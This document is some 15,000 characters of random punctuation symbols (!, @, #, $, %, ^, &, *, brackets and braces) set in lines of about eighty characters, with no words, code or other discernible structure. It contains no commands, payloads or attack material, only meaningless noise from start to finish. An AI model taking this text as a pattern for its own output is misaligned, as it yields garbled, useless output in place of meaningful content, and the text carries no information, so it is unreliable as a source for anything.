!}}(_[@)!_[[[&^$#+$)[)%##_[%{+*@}($&)!}}{%%#[#!#*&*@@_%@@#!#{!%][}+_](*+*{@}}@%@
)+_#_^!#(#+}]!]()@$%&!{^&*!^&##]^_+})}+]*%%*@_[(!%]}^([%{]%#][$@!@{&+]**^{%}^&([
(][@+^$^$[#{@#)][}_@!]][)$_({%#)%&)!}(@])!{_#$((*[@[}##^($&]+{^]!$}^]&[&]}*{[{_^
%!)%]&]^#!+$_*+)$$(@]+]*#+@%]&$_]#*}%$[#_%^+{+}$$[&&*^_]@^*@!@^+*]%^!(){#^^(){{^
[^]]$$^{&*{)%@^$%}!%](@&!^&]!@{%}[]_![#]!]#[}]{!)+@+#!_&]^_@+$}_[_%([$(&)$)!&+){
__@!&$@!]}^&}[%[[&&_#$({}(#{%_*[#!{!{@+_{*$_%_]^^*#_@}[+${$)!%_!#+#^*](%{}_@^)(@
&$__@@)$!**_[*%!]#$%]@!@]()]%!!%_+%}[]$+%)^)#_[[}+)*{%(^%#}*%&[{{%%%[)%*%_(%%&)*
%(]#%!*(!]($!!&}%()+)*%$!}]+}!%{&+$}(#]]&()&%!&(}!&^{@]!__$_@_[)]]@&)}@$[)+{^)*%
}%%@@)]^)_](&!#[@+^$)$#}{@^{***{[^*@](}%}(#&*!}+}%][]]@#^$[*!+!@{](*]*&&@$%&[}^+
]{[#[&+&_[]^(})!#!}]{}&{_$]&&@($[[[+_{!@$_+]}](![@}$[^!)_%]^*$#)*&)#[{%@!)[_({&_
!&!@!#+&^(!%^)#_^$)@*]{_#(*{%$${}_&&$+@+[@&&!!%][##&(+]+_[}[&}_((}%[]![^$(!&_$$#
!{_}&[&+^*)]!($]@*#^&**]_($(_^])^_^^$!_!@{}]+{]^&!)}%)^{]&*}!%%!%[(_%}{}$#+!])!!
}[&}!([!)%%(}&((}]+!!)&#(&}}{+&)%^[%_%(}+*!(_[*!_[#)^&&+}_$!_$!&+_[+%*(^!&*@^{@[
]$&]}#[&[#]]]^#%])](!+]]%!+$(*@^_#^*_&)@[${{$]]#&]!+&_!{!)!%*+%_%_)$]#!]{+_[){$^
_#[^$_#%^]^&[)$@)]]{@@^(&[([!}@}%]!+_((_^[{$&^(^)*((![*{_+#(]#^[]_^#([[^[!!%]$!(
[&(_@!*^{&{+(_%{!$%#[&}&@&)}[^){^}!$){{%$&)_@))+(%#@+{(^+)}%$_{*@{#]@([!)@&+*!%{
^}%{+&#]^{[%%]+((*@+@{+#_(({{$[[@#%!+{+]%^@+#^][}#+$*&@+@&]$%^}*@_)}}*[]+}_*@*@)
[$!&_[^@){[_{#{%{#$+!}{#!@&&#(_#@&}(!@+#*#@%[@%%[%[$&@!]@_]!{@#))@]]&]{$}}%$[}*]
)^(^(&}[$#}^$_@@{&^}}[%[*{)$![&*&$![#)*@_$]^$)%&&!_%%][+$()#_&)_^+(%+)_&^]!+*){#
)_]!_&{[^_}+@%#}#[*%]%+!!(()!*_(^{#^!*}#^}$_^}$}_}{_#^@}@%!_{^[!]&%_](}]$#()#{}#
)*+*}*{&$+}[{${[#_#{}_!@}&)_@[!)_))}))#($[_}^^${)@^(&[_+!_^[(&#}@_}{]%#%)[]}]*{)
&@!]}]%_{+)!@%]#$_*#{]+!%!}[^{[)#[@(+!*&_{*]]&]$[*&%^{^!$!@*)*(_!+[{*^]@}+#($$&)
!$(^)]!#*[@][^]@}(&*{}())@{%^#))*+_+#_})(^($$%{{![^+@!+&}_((*#[*++}*^^[*@&!{+%+]
_&%}*++_(*![%^{$_!!&_$}{+%{!!}+!@&+}(}}[}]){!{{&_]_]&)%!!*^#__(^%([#%+&{{)*}&}$(
#^!^#@{%${^*$^(^{(}#)%!&#})(}#}_(&#%^${#}#]{*@^!+}!$$${&#{{[[*^]]%^+#[+%$@]@#]}&
)%&)}[^+^&@$^)]&[$*{^%^@**]^*!^!&_#%@+(@][)([&^(@@^@&!&#&_}&[^!^@]**{__}_!+}%!_^
_^])^@^}&(&#})[(@&*}_{{$[&^][+*&{!+#%@#_]$[{$@+[{[@}]}{*(+$#^[%[@&}]^^)_(]{@{##[
[_&!$]_$%$*]#!^}(%!*+_^}&@++_!%$(!!_#]{{$()))&*+}#[@@!_%%%*!_+)(@*@%)_{^!%![#_+!
{_*)!(@[%@{*{)]$*_&%*$+!%$&&!(%}^]^!)*@+@!){_(&#%[_)_]*[$++&!}@])#%)}@)!+!%]@*+#
+%&*])!{()@}*$$+){_)%@[%[*+$]#$}[#{#$)]{*!}!&##_^+&]])%!^((+}](*!&&&!^^&!!)^!)[#
+(${^&^%+}@!#[#%_&]({$&)##^%+#@*]{_%#^{%_%+}@@]+%}@}]_)*^@*}+#*##+]+^))*#^^}&]&[
$[}%@{)&#_}#$&[&(]})&__!_@&]$]&(_{}^&_*$!@)[+%)+#()(+$_$!)*+((_)*@##{+#++}[^@{@+
_(}+}%[@&{%((*{{]+^}*]@%}@)%#![&)])^}]^&[@]!#(&}^!][{}$)]!)^^&^_&^[#)+[%#@+}@+!+
&$%)$&{]@%)%%))+%*{^#[@$+}(%@[})#$*@}+(}[&_%^&$&}}]%({^@*$&^@{]}!@(})!)[!}@!_+&^
&}_&%+!#(%#{[#&[![%&)$#+@[!)_!@_}})!#^((^#!+[}+&)(%!!&#[_]##!+%][]]+[_@_(}_^!&@{
+$^_]$()$({])##+(+%)+[%&+[_{%[##(#(!&_$*@#+{#}*&!&{(^#))$^%%@${}!{@%^^((#&)$!%!{
^_^_&!%}#()@+(^%%)_]@%^[]%%!*)}!}}]!#{$^+*&[!@@)!&$^]{+((*]]_*_#{(*!#)$#$&+^)#_$
+!*+#_)!(&%[+}(+(_*&$]$%+&&[])!#*!{(}_[{_%]^(%[)*+(#(^+%__{[@+)@]#%(($^+@@+%(_)}
]+!%*_!++[[+]]@+]@}$)$^)_#^@}%}#+[+%^*!!{+${$]*$!#@](@@$*#*^+@{^_+%#!^()*&(}+$_}
{&&&{]%$^_%_!+#%@$%_}#{_*!%@+^+{%&&![*%(]#]$![)#)***${*)#!()+{}+*($($*)%*)%([(!^
{[#)*^&(_^^$]{][%))[+!^[&[%@[*!]%_+@@}$^$^}**%%_&__{&&)_]+^(@%)+!}!]]^%}!++(&)(@
]@{^^^]$]%}%_%($*&^*(%#&#)&*&[$@&+_}_!+!{^])_!}}*![!({&$)%(%^(})})[@&]*(}]@$@{[*
))$&%(#&_^@(&$]&@*%]+_{@^)+({&&}[*%}[{#$${@*}@]*!(]&)+&!!^}+*%[])[)_!{$+^&#%+@(_
#$]+#{#!$+%(*)#]}[%]**{![(}++$!#)&}%#(*@)$]+!@++*&_]}!![#}&[[)@%(&{_[^{{[}$[}^{*
[##_]]!}(}^^@!(*#&[%!!]_^(@^((_#%$+@{^$%{)#]{^&&!@#]_!}{#*!!{]@{)(@&^*^]!&^@](+#
_^!_^*]@_%$(]^$!}{*]&!+*+#!+(+^[%}*(}](%%{]##)_}*(]++]#*}]$^%({*{$+&@@#^!()&)%_{
[*!(($$)^%+_]]{^{%{&^!*}[{]+]%(*^]{@)[#{_@_&^%%+${}{]{%*_%#$)_*]#$_@$%#^{%*%)@%]
^{]()$%^_($]{^*]+!*!_])!_)%}{%^&]$)^[)^@^#_{{)!*
%{)[[^(!]*$$#^({)[)%[&!![__@}(*){]%)]@#*%}_^}#_$(&*^+%%+^}!#]*[!}!&@#{+$}*#@#*((
}@+%]_@+!!_!%@_}_{[$*_(}%)#{}]_^!+#*@])+$+**[]#^_}{+}*&{)#%{!_$$**}&(@]_+)[#}}]^
%^[[{%@)%%+$}((*(_^_${*[$&+}@%&^$%&[+!@#]*%+$_@*!}#)#*((*&[$!+_]%[^$[]+$[({$}}!$
[^&^([!*])_@+@%!^!%}[(!#***)&)@{{@]_#^_+{*)^^_+&#@{]{@#&]@+*$$_#{!^#&&^{]*#)__]+
&)&)*]##)%#&){%!+*[$}{#]]$_(@(%])$^](*%#])[*({!^{&{%__!(%[*__)+#*_(*]_[%{(!_}^*{
$[%$}{^@_+*(]##&(+{(}[!_[}}$%[{$&[@!!@[%{[]&%[&}^^!]{]#@$)%(@)+_)}{_](&[(^[{$+%%
*!}}(}*&[!)*!&!%}}*}]%]{^@{**@[@{]*{#@}+([@}}[[&_%*)_){&[)(]]^}^@#]%#_!(^_[$$+!!
#&&+{#+!^+++*!![^]@)#][&(_}$&_(!_[$&%{%@]%]}&$#{!^@%}%{$$^]_!((**!{%)*&^]}#)%%$]
{$^^{#[!+*]{}(&{{{{}(]#[#_+@[#+[}@)@#_!{_[&&*)@#[*@@[$(*)@^[[]^%][&@@_$+_%&_*@&!
@*{*&_&({{[@{]*&![]*_}&#!+@#+&&_(+#*[+{^%@_+*+}}^@*(]#{*$++)_@@]%_}!$%+]+$&^!$@$
[}^_#[({^+_%{*@}@_[]{+][_*!#{])_^_@$(@%!@!(]%))){%](#]]#}@&}+%[@&[[)%#%{{+@[(^@+
{)}{%(&+]^}^+!$!^*_*+^@*}+]#}_#^(%#$]({+{#(+@$][%$#(_[$@]@+@[@]@%]@}[[@(*^@($#_(
*)[&_{{(!*+%(_&*}@#[%[()@}]}[#&{)*}&(}]&{%][_%$@&_%*)&_^]{##]${_(*%*{!_+)^]][_&+
]{_{()%(_&@}@}[%+#^@}#**!}+$@]@+*($*}#_{)!+])#$[@%]&])*%___!*${++&%^$^#@&_{)#[$+
$+]@#@_^^_#@}!)$_#$*&{+^{+@*{#!#$!%*^!}[[{]+{[@(%_&}^$%^()[&#%@_+{(*[$#!}[+_{*%(
_+&}__!_#^&(%!&^%)(@)^!^)$([_[_{_$!){*[!*&#+((%(@#)!%!_[!#[_]%[#]}}%[$)+#@%%*[%+
^!*[([#&${}^%@{[&!!$}!&#![_&[^&_{@#))+&%$!!{([@[}*({$]&}}@&**[++!_*^^[{^(!*^^%][
_[^])_{}!*^^]@@%*(@_])[&&$[}%@$$##]&#)+!#_%@}#(%&++&){#!+!&]!{&$&})[]}$*(&&)@#[$
%^^(}^#&@!_#*%)^}{&&*]+(^{({+$^]()@[)&&[&[##[][%]*&!_}&[}{{[$@}+!{[$[^++}]}[#[^#
^!%!+}(^*^%#@}{@_[#^@)(+)#%^)+@!{}_}{(!$[[+_[%@}!){{]]$]!^[@)(}&#([((%$#&%*]#!&^
!%$+}+&[[{[![!{(_@_(^^#]+!&%([_[*}^}}%!^&^&#)&#[)*@$+$%(@+*][}}(#@%!++^_!*[+#%&_
(@@)]#)#{}@&#{{&@_^&$+$@**{(][&]#{@+{#*$_)#_!&{#]%#(%!*()+)%#&{!+*^[[[{*))$!*__}
)[%%]&_[{]{^[#)*)+#*}}(($)*(*{${}{}#[&}[![%!]%}^{&}&$[(%}^*_[)]+{!&+)[@*&&{@&%#[
!*___^_&]]#&[](*+}(^]%+^^)*}]{$!({%+_*]#&{+&)]&}}]}^+[)#_&_+&!&{[{_)]%{+&{*}*%[+
]#%{_[){!)}_#]}!#%{#][_+]}^$}))#{@{+#(!_]$[!!&{{&+}!!)@)&)}]^^@^((]&^!+!]$}${#$*
}]*_&%_]{^(_&$@&_({#!(_]@#%+{##_+*+^]!#]_]#](]${]][_]]%_{$*}[&^{!_)##%%)+)*&*__!
}&*_*]&*#(]]@[%{%]#{]+_(}^(}*!#&]^[!*]&^$+!_^_++%+##(*@+(^#}#&*[{*])#)]$*%*+](+[
[{+&${}%!){!_%&&]*!!({$#)&}+[)(!}@&!^][)[#)}@_$*)^%${]][^]$!_$$#*&&#!{!!*+_##^#!
[#&##(}+[@!{_+}%]&$((@$*(#{]@&(]&^)%#^^^[)()+*^{]%#%][[*{%@_))}@])%#*!)#_(}(&&}$
_&&@%)%#(^}&]_(_%@]}^$]_#@^]+{^#^*&&@!^$]$*#}$(!])#)_@]@[@^+}#&_*#^(_%${%(}]+&}!
{&_}}{*){)_*^_[!)$]^%%]&]_*]&*_@}]_{+@!!$@(]$))!+#)*!](@[@*&!+%}@$+@*@_(_!)_[]}!
)[^!^^^!$^$^_*#}#&{{}*}}[$#!$#(&_(_}^+]@#{]}_^]^}{&_[)[&_##_#*$[_]&}$_&]()+&$_{]
+$_{#_]%}[+)$++$}[(*!+[$]*}!$${@#@{^{{#}[!%!#$&^^[+[+^(%}(^]#+!)(@{$&}#{*)#$(&{$
($^*%*#+$%{*&]@(*_+&{*_]}%(!{)*([+()(@[}&!+{$!+%{^{{}]!(]}!)**__*]$^()@$&*+})_!+
%@_)%@([#{@$({[^*(${(}#*@[))+[^!([#]{$*^[)_^}*{$#&$$%+!%}($$!{+[$}&#^$&!^@^@{!**
&*}]@#)#&*&%&{#^((({%}$*^*!__*$_!%^{_!^$*]#*_{!(*){$}^${%@$$$_}%!)*(^}+)@}$)&+(_
#([]_)&_*^_^*($$+&[$!}&[[@{])[%*_$+%])[(!+)#@(()!+^{)})%@&&^@]}#^@]$]+)])&^_]_]#
$&_*))[*[{%_##^#(*[$$&!$^#^*++$**}){[*+%))!!+%(#}@)[$$$&$+{+%&+&[{]^{!_)%(*)}#[(
$@[_)([@}_%&%)@{*)]^%*^!!!%]{}!([#!^^[+!^$+}^&{}*(+]{![!)$$&{!{{[^#$){+)(&^{)_{!
{{!%}&&%#}!]!_&%@@_])((}}(@^]*+})}{*{@[$[&%(]%!_[(}%+)((*(}]&#*_$[^#[![_)%_+((@}
!&(_&^+[(!#+{@#[[%[_)_*]%+)!@[(%#&^+{#$)$]]![(@+@(]*%#{@#$&#&*&!#_)*[@*+++{+}@](
#]#()_)#^}&%#(^$&(}^#]!$]^+*$*]*%])&@}$!{^_&+$]&{}{*^$_(]]%##%)!#^(@&)](](]}]_@#
%+]^+%&%([^)!#_+^]%++#+!({*)^@#)(_&^$*(_$](@[{@_++_%@_#][(&$&#}%@##}*!_[[+@@!&}*
$@^*)(*^!$%$[)}${))&^*+&_#*[{))(*_##&*_$+^&^!#![@@$[@#!&&)_+#%)&@(!!^$$!^!(_{%!(
{^$[[#[@@(]}{!+)[($%({@#%[}}+#^]#{%#^#*]#{)&__&@%+)@@}_!*_#&]{])&_#)){%!&]%##++[
({+{_#[}}#%!&&*#{[##][]*@_&#*+!)]__#^+_!^*_}#+}}((!+]]++]%_]*){]%_}]]&%{_%]^)!})
[@*!*!@_[]__{**[}*{{+]@&[@*!&]^_{[($]}^[}%!!(@+[]$)#!}${*#&}}#*^%&!{*#$}){+!{!@#
]*$]@(*$}[!@{($*&+[_[_*+*@@%_]*$[*%#{%![]!_@}!_{#)]!*@+[*%&[{^_]!%#+!}]%*#%[@{}$
^[[})(&&_%#[}+%]{{*%](*^[%])(_$]+[[&^$+{&]*$}]%$#(_$!&##}$%&@[[{)@#&+&(&@!+)@@+[
@}$][([]*]&&%__*{*++!($#@$*+]^&!%)!)*@]$#]*@#*!^%+#(!^#{{#*(][)([&!@!*%^*(#{&{{[
{}*_#+*%(}*(%$^^&$[_)[*)%)_(^&&!&&%$(([**+)_)$[!]%{$[({[$$!}_(]^_%{^[%$*@^_!!&))
]_(_#!}]&&{]{*]]%{@{+$&!@&!_{!&!#]_(!%@[{)(&&[#)#$#{[!^{_*]%[^+%{^*+#[!%*#[(@^#(
#{*#&+_{]@^#[[^_!+*}]!^$#$#)#[$!})%}#^#%%%@_+$((]^*#^&^)[]$[]!{^$%&*%&!^^!(+$#$&
$(+({[({@&{^)+@]]$_(%_&^%_&%!^(]_!{*@*+[#}}[}{@&&#(}@#^[^{(@_})_*!+{*]_(&+]#)*[@
{{$@)&&{&%%*@&_++)$[_}^&@$%@_[^]_}^&#^]#&^[%#*[!}!&}@##!@
[@+[_#[({*%)&{*^%]+[_+%(&[(%!@&$_*}_+^)+(}))+%]))[#($^!]+^$%}([}!%#%&!&}^)@(_{[@
+@)^#)]$#&!+_]_@]${^^)[+$[[)*%{!({&#@+@!*!&*&_&!*!*@}#&%]%!]&%^@&#_$%}++[%(*$&%(
$(()%}]#!])+#[]({{*!$&(@&#}[}#[]#[(![#{*})@^]*!})#*+}@}^}^%]^!}}#({[&!^(%}]}{$*}
*@^{*@^[&}])(!%&(_%*&}{*$}^@#]*^%&^$__$)(![@$)@]+*!+__{#*_^}%@)_$]]#@{$__%*#!_*+
])[%][!]({#+&@{}}{)()[#{_{_%_+&^{[!#$$]&_(]+@{)#&^+${]!@&][}%(]&!*(*@!)@]__![*+#
}+%&((]+&#^!$+__@*+(&#])!^!%]$^#_)[+]+*&@+@{%{[{_@]([!_@_&{{$[*%]}#[!&@%}(%#{_}&
*}&{)_[*[_*%[$_(@]!@#}${^#+)^$]@^{#]^_%&@%(})@!{{!_%@#(@(_@{^#[!^**)!*&](![[![&_
{#%!#$}#*!$+&)}$%*_&&#}+]{__@!!^%@[+]%[#!*!]@{_%+#{))&#@+}}[%&(@@(]((*@@!}]}{#!^
+_}][^[^#}]+][+%]$__*&&+]!+$[+(@$__&#+)}@[*{+(%*)&@#)+*+!}&&_$+[#$[*_#%@{((&[$%$
}+$#&+}!^([^!](!%&)#!_^!#$*)[[{}#[_(@@^#+$)(}_$]^&[+#+})[#]%)(}!}+!}##_$$&#@^*]]
$%^))}#($]$_*%%+*${!_(){@_^(*[_^{]{()]){^&#@_&@{!)!&)}]%{$*^(&#]}*])&{&[+[^_*+@[
]%^[^_%%{]!!$([^!*##^)^%%&@[{#+%)[)!#&[]@[{]+!##@_)%&[#@(+)#&&)_[%[#[*(}&#_@[[$)
%^%{[{{}+&{*]*_[*$[%[)_{!*&*+@)_@@_!+*(#!}_[(!]@@*{#&#(_{]@&$[[&&(#^{)++}#(#&{+(
()#](()]]_&)!}(][@_%{)*+^$[((){(#)(_#%+%!%}))}%@)#*}_)#$&}(*@][@}+##%+}}_[[%(!&@
&)&@#[$^*^^#*&)#!#{_][@#*^}$&!#!][$+@{)}^^^(*^}$%[&(@^#$*!}*$&^)!_[]]}@[+#)**@&]
@[}{_[@$}**_%+]${[&*#[^!#]*[(*$)@]*[*}*&_{%(@)]%%$]({]@&%]&_)%_#%)#**{&*(%&!*+_}
[^]^_*#[!^+#$!_{[}&&])#$_@!#]&_{{[[+*()#{*}&#(+}}_@@(@&^+$@&}*!^!_*[%](%[$)_[]&_
+(&$@})+{{_}[&*_!*^^!!+!{((({[[$^^%!_&[][!%]}^&{&&]_}$@$}[(_{_&{#$@$@!#[)}_{($}&
&@#+(((&%+$&$!!*^}{+}%&^{&&!_]+}}][!%[$){)_[+(&+{)$(+(+*#%{%&+(+}+*%%}_]&+&[^_[#
)_+#}!#@$){+}##+}+*%}@}[#!!@_)@&%*{_!{{#!!##]{}{#+_}]+({]^}@{]$_@*^+{_{^]@**+)[^
[%&[[&+{}%@}}*]##]}%#[_+{)!*_)[[^#!(+$+(_!})]()#)}*!)_{^#[@!#]]^()_@]^]$@!+_$!(^
&{[([}&!]{_%%$+}+!%!({_]&+@]@[@^*)_+_(%#}*#_#%[#*+(!)}]^$)%**}]@&]%++#})[_((@[}(
$(]!]$@&!+]{#]*_{)(@(^]*[+[]@*#{&#+%%&(@!@{)(#[]]%[!+(&!&@)&{^++&}*_*_#{(_&[(}{!
}&#(({#%$^(()^}^^{$][)+![}%}[!()@%_^][)@+]+@!!%+^#@++$%(@*$]^*{]!+###)^#&@[^[(#}
)+{!}(_@#@)([$^{$@*$)^{#!]_)_&]{}+(^]}*[(**]))@)$+]*+[_]@&&({#(}[_*+%){$&^}}(*[_
*^!_+^_#(_*}))#{#$)[^$*(_+}[#+_@^#{+){${]*)[]]}((_*%_^+&(&]}!!!)@(++{)%&#}*[^+$^
]^&]}&&@}#*#@%**[]${%!}*](([![@^}^![^+@%[^$*&#)}*}^_%_]%{[_*_#}!_!$({^&[(@#)$$$@
$@_$*@_{(_{$$$%_%}(}]+(}){}]]&$+*][)%]^@&#]]&}+%}**!+%*${^)^{%)&%%&#]}&%+^_@_^#]
{@*&!$&]%{[_(^$}(({]^!#[)@@[[{*]{)_}]#*}$#_((#*+^]&]}]@^#^%^^[*@$}&{{&#*[_{]%#**
}[%(^{_&!++[_)+@&^])&)+!(@%+([![$*$+&_)&_*#%!#]${[}_)+)&$#^*##_&}$]]++!#+(@#!#[}
)[+)]+{@*)&(^{^!+^^]!^)[$_!{&{+]{@&#!_)#%_[@@_[#%*%)*])$}%{++%[)&^[+!#))#(+_+$${
#})(%&!!!${($[$&[]+)^}_$$[%}^[^%!)$#%!}[@}%%*_^[+!{!_!!@^{{_]%}#+{}{{$+#}]%[{*}_
+#@[(+!%]*#]{#$%[]+[*[#_+(^]{}#(!!{]&!}}#{#&{)!(]%*#*$(@}!^]+{!(&+%**#@@$](%#[!+
!!)&!]!+^$(}(@{#@${]{^&$^)[!*[@#]*{%)+^}@)(%$$*{{+@!!@{@{}@+@!*&{%]_@^)*$+&&@+)*
^}{&*{*}_$%&((#&}%($*%]#+!*)@{$@#^+}([[*%)+%$@]}@]%({(]$$__+!}}+@@!${%(])+{}![@{
{_]+[&&@%%(#{(^%)++%)!&!)+&)&]&}[&[^*!${&!#&&*^)[&$]!]%@{%%!&@@+}{#*]+%&!#^_]!_@
@}_%^^[+{_*[]%!@(#]*%}{+@_}*{[%^@_#{@}}[%[@+]@_()$)[[*!)(#)$%$%(^[^++_++@})$[&+(
%^^%#{!)#*{[+!(!_}[!}_)&$#&]$%##))#&%!+^#}()+@{^^@)^)}]^{]+[]+[[_(]+}*+_*+]$%)&(
[)%&$}&!{+&}]{@%]@#_[]({+]@%@&]@}))!@({$]*!)])[!@(&%++(}[[$%!![$*&^+}]][)!)_^*&#
%[+#}(&!&^_*]$^${[^_)_%!}%*{@$]^}}!_$%*%_$#_({+${_]*_$[)[^{%^@@[##&{)]%]%*%)&_#^
&@(^}(){)&$[#[##%]*^@*{&(]$$](+%(^}@!&)]@##!&@!^)![#@%[&+@%^&@^{_&%&[(^(}+&[(&%}
(%+{*{)]^+[{*+&+_)^)$)[]{}]&}%((_%%[_#}[}*%[^_@!$%)*^@]@%+[#$}##&!_}[%[![*^}_)+#
_*+@[!(^)&++[+&_^%(_@]_@!^&{]+*+&@(&{@@&{##@)_*#{)^[%+%]@^$%@([#)[+@[_]+#}!#+!&]
@[(&+_{@#^&{$$[#]&@!$#$%$%(((_)!)]]*}(@*^$)!!+%_!!^__@@}[*^)%@**@!@}&!{&%+!#!(^@
@{^#*)+$!@$&([++@$@_##+%}_[{}_#{@!@@#$(@&]^]*%!+$)(+{[+^%^{+!}!&$[&#@}_&{%![^#*+
#]@(&}]!@[}+_]!{]%+&)^{[@[__}}$$&!]#)_!(**@(+*!^}+#)}!)@$^![^){!#$[*{%&![!^^^_{[
*[*#_*&%)&)}@%!@!&#]+%^#))#_#(#]*#*!@^{()&}[{%(&[^)@$^%(}&#@(%+@%{%%]*{$(@%$]*$]
}(}@$(!!^]+)%($)_[!@%#{[@#((%+]*!*)%([]{(}*$]%#^*#_@@}+_*{$+(%]}$@{!#*%*[[^!{)&#
#*!#^*+[_!$^%&)%$_@%}[%}#{{}%!$)[%+[[&%)^(@(_^)!*@#^#@@+@[(@)$(^&_}%%)@{$%+){(+[
})#[)!!@))^@_!}(+{{(%#&[_}+_)_{#%%[%^(]]([(_!@$#$%*)$+(!_##}]_@+*!]&}@}$&@!#)%_#
#@+&(@[*_*})&&#@^]{(()!#^)]{+$&(}!%{!}([^^*}(])[@(($@^!^___)!}[{}*#%_${_&}{+[}{%
^$!%@{_]@%%+$]%[)]#_#**_(_*@!_(({(&&^$#]@+{&]]{$)]$)*}^+_($#$_*][@^%&$(_+}&]${(%
+_$!$^]#@}{+#@[]_%#^${]$(@$#[!^+&)%)+&#)&{}}@([&{+{_@}[++&!&}#$}^({])^&[)&)]_{%+
@+]_*^&+}^@%*+))}@!@#@{%$_&$%(@([!)))@(+]&$*^}$_+()*[(^(((+[@@#%)&$]{}{]*(@(@+^_
){*#@)))#)}#^)%&](%(_}[{&$#]#$@*[_[]_%+&%}+%#)!^[}[%$!_](^}]){)#^[#]_(%(!+[{^^%{
^[+))[]#@}$_)((+*_]_[^(_*$)&$($!#%&_#]_^))+%+]#{[{{@*}[#(#($&@}%@%#(*}}]#+^{{&%&
{}+_}}{%*]_#$@}({%)}%_!]@$[${+]@+&@!]&$$!%}]^!%_#%#)$#^+{+%&#+^()_%@%!&[!$&[###]
+[_++$%]&_#()&#{]&]_($$)$%]+^*$[]%{*^!(}%#([!%[@{**_)@##)_$({[#()@{]}%#*@$(!^%}&
$#[()}}%)@)*([(!$+*^__]!!+}&+$*^+}{^@]!)!*{[^&_^)%{!^##}[#$!+&}$[]&_]#_%$(@^{^)}
{]#%]_%#]@*[}&[$@_*_$@]{[_#)&!@@}+]}@{*%({({((!@{{*#&#+!)$}_!!^#{^^{&}[_!*}(_}(@
@@_@@%[)$)!&^^]{$@&{]+(#}+#{^#&*&__@*&&_&!{]+%+^!)*%!$}_()$#%^{)+@@^_]_$&_)(_*&)
}]!${+_[*)+#[#^^&))@^$%&^_!(^{}[])%$][&_!)])@%}+({}+]%#{$]@^{@_]%*#!_#!((+_(#_]+
[@**!)^[#^^%#*(!_{((&!*%!!+&+%)_{$}+^@[)[@]$_$*+&(&{)^%]}(()*){[{]@}[]]*%!#](*%@
))((])]*%%%$+(%}$+%#[#^%]^@)@^_^)#%#([*%*@+(+)&+++(^%]*!$_$$$%$+&]_+[@_}%&@@%){)
_^{^+!+%^)]!_&+}@+^$_]*#]((^&$#!_)}][&#$+&)]_*#{%%]}}[%*${&)]}((^(_}(](]})*]_&))
+}^_}$)@@+{([@%!@[_]]+%(%%%{(@[_#+@&^__+!^!_^@]@^#]]##%*^]!$$!+[#)^![@%++%$[&[)[
$$!^&!({]{)(@(%]%}{]]{%#{&!{*@&)%%&)#$+($[[[$+_#@!]%#)&&&+*^%*]#_@)[]]+++[]^}]%$
+&^^%({}}{])]!!}]**&!{[}+*$@*{$$_}(^+(^(!%@^+*+%$!}{((%$%}^{%@[^@]^{{%_(#$(&+]$*
_^[$$+!(_(!](!+^{}$]@[]$}*)]})_[#+%]@%&@*&{@&+)+({[^%^++)*#+*(+!}*%^})+++@}_&#&]
][*}^+[!@*+$[%%(*[_$+}$]*}]%$%@&]@)!@+]$(&]^_$!)@+%!+&(%]&[(#[#}_@%&_{{]^@#}&_(+
#$^#$&$_(@(()$(@+*)^{(})[#%}%$(@@[*&!]_+&%%^###]%[+)$[_+$%$$_]#&#*#$+@#)%&^#_}_}
_%[@{(*)${##{*@{[]&^[&%^[)%*[]*)$*@)[$%{{^#^(}!!_$!+*^&!)([!!]_%)([(#])+$*%[@{&^
^++{&{@%{({^&}@!^)@]%&@&_+#]]%%[]+%[^)@#+{+)&{*@+&&}_!_!!$$${#({{{#+))]*(&&@{{%&
@+}{%*%[$}(#)$]][)!_%{(!){@%_##%{$)&))_!^(!#([+)]#_*)_$#}!$$})%^[%(_+!&{+^*^()![
*@$}^)}{$^+%@@^)!){@*{#*[#*#)^{@!(&@#+_#^[&^$+&$!*!@&[}&&#&@^})&(%[*%!)@[@])*{%]
@!]@([@&%${{%*@^[*$#])__&+{@@@{$+[(@!%!^_{$*^*$)%$!%_]&$($!#&)@!}#&*#(#_*#]*#%{)
*@}(]+@#@&}}_}$+&^&[#%^*%*&(!!@{^^%$_{+[!@^](@*&%#!}**^$@{$#&!!!^)]%$_)%!&{^^}!%
(*$**!(@&*+)[+(!_(]![%!^[)[!@]_$*))+(+}[+%($%!+%!&^[(^^@(_]&#@[[^]]*@_{}(}[#_{*_
!+(_^]_%&&#$*}^*+!*^}][&_[}[@]$#{]%{)*[$!^_@(&$^!%$+]{#&@%{!)@&#^}%%^+@}}%%&^^}@
*##+)__()+]!]])#!%(&+{))&)@(][++_*[@@)%{[%[+{}^*(_&(&@#&^$@^_}%^{!!][+)$%&[&]@$*@^#^#%&}*@_))!^#})$!@%)(}&_^]!![+#()}%)
%@}}%^(#(})*}){+$_[+]%%]#(*[#_(![&{#*$){_%^}+*))&+)$#_*}[][@}_#%@{+(+[#}(]^%}^}+
_$#*(^]{&$#}{@_^^!(!++]@}${]{_)%#&{@^%$+{)]+_$&@[)#[!%^((@(}$([#$%!]&[&*&!#![^@+
{#@+}@^@([++{^%$^@@}}*{!$*&^&)$)$$$}[#[%!_]+]]*_)!!&[]}+$!}%+{!(&^!#{##}!}&@(])+
^(+{+_%%])}(*!*+@+^$*#})+&{}%)(@%[{#^+&@)_[(+[@@&{@){#({++_@(((*&&{@$&[[%($}^{(+
&*%}%((!&#!$[)_(}*@^%[@)]#%*}}]#!&*$&+[^{#+##(_%_^)]@^}*^]{[^^]!!+^+^$%#))^%}*^#
%#(*}&)[{_$+@}}&_]$&_{]$)]&[{**$^(#$][__{@_%#%&^)^%!#[]@$@$([!$+%@{(@)@*^}(+{)+(
_@$)^&@+})_^^]%*$^^}_]@(*&)+){(^)_#${%{$+#@))#)[)&$][(*&}}^]^_%!*#*]$@%}+$#^$[&(
%!*_*(%))^[*+__*{+[_)++))(#_%(+!@#+@^^&[)*_^_+_%([&)@#}!#%(!#!!}$[@]_@{)^[{%]*$%
@&*!$_#{!$_*_!{*()@]+_&%{#!$%^()$](^]&#@!$%))#]@*{@($#&(*&&@^%@{_({{*))+#)){$^+_
*^{+)+{]^+%{^^&+@)#+@@}*^(^)^)_!%!&())^!+]&*@[*^@{+]$[_@%%%&)(&$$#[@&$%*{[_@)[{[
_[!^}(#$({#%[&[{]@*^^+&&((*{((!&%}$$(##[+_#]&!{$}@*]((!%_]&@]![!]{$#%^%+#{#+#[*$
(]@!%&}(]@_)!{*))+^}#&*}@##@}](&)!#${_)&]&[^%_^^{{+&&%+@&@!+@__+@#]$]*!(_^+!$^{_
*}$[%^$(%{(&])[*[@^+_[]#%#*!}{(!}#](])@++{&}%!%+*#&^&!_$(#_%([#[_^[[{$(@#]}@+[@%
